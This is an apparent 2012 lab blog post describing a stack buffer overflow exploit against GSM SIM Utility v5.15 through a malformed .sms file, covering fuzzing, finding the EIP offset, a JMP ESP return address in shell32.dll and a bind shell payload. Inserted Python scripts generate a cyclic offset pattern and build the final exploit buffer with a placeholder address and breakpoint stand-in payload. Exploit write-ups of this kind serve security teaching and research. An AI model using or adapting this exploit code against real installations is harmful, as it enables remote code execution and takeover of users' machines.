Thursday, 11 October 2012

GSM SIM Utility v.5.15 Buffer Overflow Exploit

Assalamu'alaikum wr. wb..
Hi friends, today we are going to exploit an application named GSM SIM Utility v5.15. I had some interesting experiences while exploiting this application; want to know about them? Let's get it on ^^

1. As usual, prepare the application in our lab and analyze it.
     After analyzing it for about an hour, we found that the SIM Editor has a vulnerability in the way it handles .sms files.

2. Make the fuzzer
Now we try to send some junk into the application. Here is the script:

junk = "\x41" * 1900                    # 1900 bytes of 'A' (0x41)
open("exploit.sms", "w").write(junk)    # the file that SIM Editor will load

Here we hit the first "interesting thing". SIM Editor did crash after we loaded the file (exploit.sms), but when we read the registers in OllyDbg it looked like an SEH-based buffer overflow, while our instructor said it could be done with the direct return (EIP overwrite) method. So I had to try again and find the right amount of junk to make it crash directly.

After decreasing the junk step by step, SIM Editor finally crashed directly with 1900 bytes of junk.

3. Find the offset
Next, we generate a 1900-byte pattern with pattern_create.rb and put it into our buffer. But this time SIM Editor failed to crash... OMG, what do we do next? We finally realised that the application does not accept the mixed character set of that pattern (it only crashed on plain 'A's), so we cannot use the pattern to find the offset automatically. We have to find it manually (hahaha).
After patiently dividing the buffer and searching, we found the way, changed the fuzzer code
and read the result in OllyDbg.
From the picture below, we found that the offset that overwrites EIP is 810.
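As an added example (not code from the original post), here is one way to make that manual offset search systematic when pattern_create.rb output is rejected: a cyclic pattern built from a restricted alphabet. It assumes, as an illustration, that the editor accepts uppercase letters (the buffer of 'A's above did crash it); the 1900-byte length and the 810 offset are the post's values, and the EIP value in the usage is a placeholder. Every 4-byte window of the pattern is unique, so the four bytes the debugger shows in EIP give the offset directly, the way pattern_offset.rb would.

```python
# Added example: locate the EIP offset when the Metasploit pattern is rejected.
# Assumption (not from the original post): the target accepts uppercase letters,
# so the cyclic pattern is built from that alphabet only. Every 4-byte window of
# a De Bruijn sequence is unique, so the 4 bytes that land in EIP pinpoint the
# offset in the buffer, exactly as pattern_offset.rb does for the full pattern.
import string
import struct

ALPHABET = string.ascii_uppercase.encode()  # restricted, "safe" character set


def de_bruijn(alphabet, n):
    """Return the De Bruijn sequence B(k, n) over `alphabet` (k = len(alphabet)).
    Standard recursive construction; every length-n window occurs exactly once."""
    k = len(alphabet)
    a = [0] * k * n
    sequence = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in sequence)


def make_pattern(length, alphabet=ALPHABET, n=4):
    """First `length` bytes of the cyclic pattern; all 4-byte windows are distinct."""
    return de_bruijn(alphabet, n)[:length]


def find_offset(pattern, eip_value):
    """Given the EIP value read from the debugger (e.g. 0x44434241), return the
    byte offset inside `pattern` that landed in EIP, or -1 if it is not found.
    x86 is little-endian, so the lowest byte of EIP is the first buffer byte."""
    needle = struct.pack("<I", eip_value)
    return pattern.find(needle)


def write_sms(path, data):
    """Write the buffer to the .sms file that the target will load."""
    with open(path, "wb") as f:
        f.write(data)


if __name__ == "__main__":
    pattern = make_pattern(1900)          # same crash length as the post
    write_sms("exploit.sms", pattern)
    # Load exploit.sms in the target under OllyDbg, then read EIP from the
    # register window and feed it in here:
    eip = 0x41424344  # placeholder; replace with the value the debugger shows
    print("offset:", find_offset(pattern, eip))
```

If `find_offset` returns -1 the bytes in EIP did not come from the pattern as written, which usually means the target transformed the input (case folding, truncation at a delimiter) and the alphabet assumption has to be revisited.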

4. JMP ESP command
Next, we use the shell32.dll module loaded by the application and find the address of a JMP ESP instruction in it; that address is what we will put into EIP.
5. Make the payload

We use a bind shell payload and put its code into the fuzzer.
6. Make the final fuzzer
Once we have all the code we need, we put everything into our final fuzzer. One important thing to remember is that SIM Editor does not accept arbitrary characters or the raw \x-escaped bytes as they are, so we modified the code like this
7. Run the fuzzer
The last step is to open the file in SIM Editor and telnet to the bind shell....
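Added example, not the post's code: assembling the final buffer from steps 3 to 6 and checking which bytes the target is likely to reject before the file is loaded. The offset (810) and length (1900) come from the steps above; the JMP ESP address is a placeholder that must be replaced with the address found in shell32.dll, the allowed character set (printable ASCII) is an assumption standing in for whatever the editor really accepts, and the payload is four INT3 breakpoints instead of the bind shell, so that EIP control can be confirmed in OllyDbg first.

```python
# Added example: build the final .sms exploit buffer and check it against the
# character set the target accepts. Nothing here is the original post's code.
# Assumptions (not from the post): JMP_ESP is a placeholder, ALLOWED is
# printable ASCII, and the payload is an INT3 stand-in for the bind shell.
import string
import struct

OFFSET = 810          # EIP offset found in step 3
TOTAL_LEN = 1900      # crash length found in step 2
JMP_ESP = 0xDEADBEEF  # placeholder: use the JMP ESP address found in shell32.dll

# Assumed constraint: the editor only accepts printable ASCII (no control bytes).
ALLOWED = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def build_buffer(payload, offset=OFFSET, ret=JMP_ESP, total=TOTAL_LEN, nops=16):
    """Layout: junk up to the EIP slot | return address (little-endian) |
    NOP sled | payload | padding, so the file always has the crash length."""
    buf = b"A" * offset + struct.pack("<I", ret) + b"\x90" * nops + payload
    if len(buf) > total:
        raise ValueError("payload too large: %d > %d bytes" % (len(buf), total))
    return buf + b"C" * (total - len(buf))


def bad_chars(buf, allowed=ALLOWED):
    """(offset, byte) pairs in `buf` that fall outside the allowed set."""
    return [(i, b) for i, b in enumerate(buf) if b not in allowed]


def bad_char_summary(buf, allowed=ALLOWED):
    """Distinct disallowed byte values, sorted, for a quick read of what must change."""
    return sorted({b for _, b in bad_chars(buf, allowed)})


def write_sms(path, data):
    """Write the buffer to the .sms file that the target will load."""
    with open(path, "wb") as f:
        f.write(data)


if __name__ == "__main__":
    # INT3 x4: if OllyDbg stops on a breakpoint after the file is opened, EIP
    # and ESP are under control; swap in the bind-shell payload afterwards.
    payload = b"\xcc" * 4
    buf = build_buffer(payload)
    print("buffer length:", len(buf))
    print("disallowed bytes:", ["0x%02x" % b for b in bad_char_summary(buf)])
    write_sms("exploit.sms", buf)
```

Run it once with the INT3 stand-in: a breakpoint hit in OllyDbg confirms the offset and return address. The disallowed-byte list shows which bytes (here the address, the NOP sled and the payload itself) fall outside the allowed set and need encoding, a different address, or a different padding choice before the editor will load the file; the real allowed set has to be measured on the target.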

 
Alhamdulillah... we did it!!
Wassalamu'alaikum wr. wb.

